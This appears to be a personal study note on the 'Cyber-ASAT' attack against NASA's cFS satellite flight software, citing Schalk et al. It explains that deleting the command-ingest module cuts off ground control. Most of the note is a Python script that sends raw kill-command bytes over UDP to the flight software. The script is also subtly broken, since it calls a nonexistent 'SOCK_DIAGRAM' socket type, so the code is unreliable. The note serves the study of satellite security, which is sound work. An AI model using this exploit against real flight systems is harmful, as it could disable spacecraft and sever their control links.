date: 2025-02-28 previous note: [[1011.2.3.3 Simulated Cyber Attack on Satellite Network]] related note(s): - tags: #satellite-cyber-attack # Exploit Command This vulnerability was severe enough the Schalk et al., named this the Cyber-ASAT attack. This is an exploit in the cFS command that deletes the command ingest module that is responsible for receiving commands from a ground station. There is an actual command that deletes applications running on cFS in the cFS framework. This is a major vulnerability. The only way to fix this is to manually reset the software, which is impossible unless you do it from space (Schalk et al., 2022, p. 354). It is equivalent to being able to run a command on your computer that deletes the program that reads input from your mouse and keyboard, and then the only way to reset it is to climb Mount Everest to hit a button. The code is very simplistic and is as follows: ```python # import library form standard lib that reads and sends to sockets import socket # This command deletes the communications module kill_command = [0x18, 0x06, 0xC0, 0x00, 0x00, 0x015, 0x32, 0x05, 0x4B, 0x49, 0x54, 0x5f, 0x43, 0x49, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00] # creating a function that once run will transmit a message # to cFS def transmit(command): # convert message to bytes byte_message = bytes(command) # open the socket opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DIAGRAM) # send the message to the flight software opened_socket.sendto(byte_message, ("127.0.0.1", 1234)) # send the kill command transmit(kill_command) ``` --- # References 1. [[Analysis of Vulnerabilities in Satellite Software Bus Network Architecture]]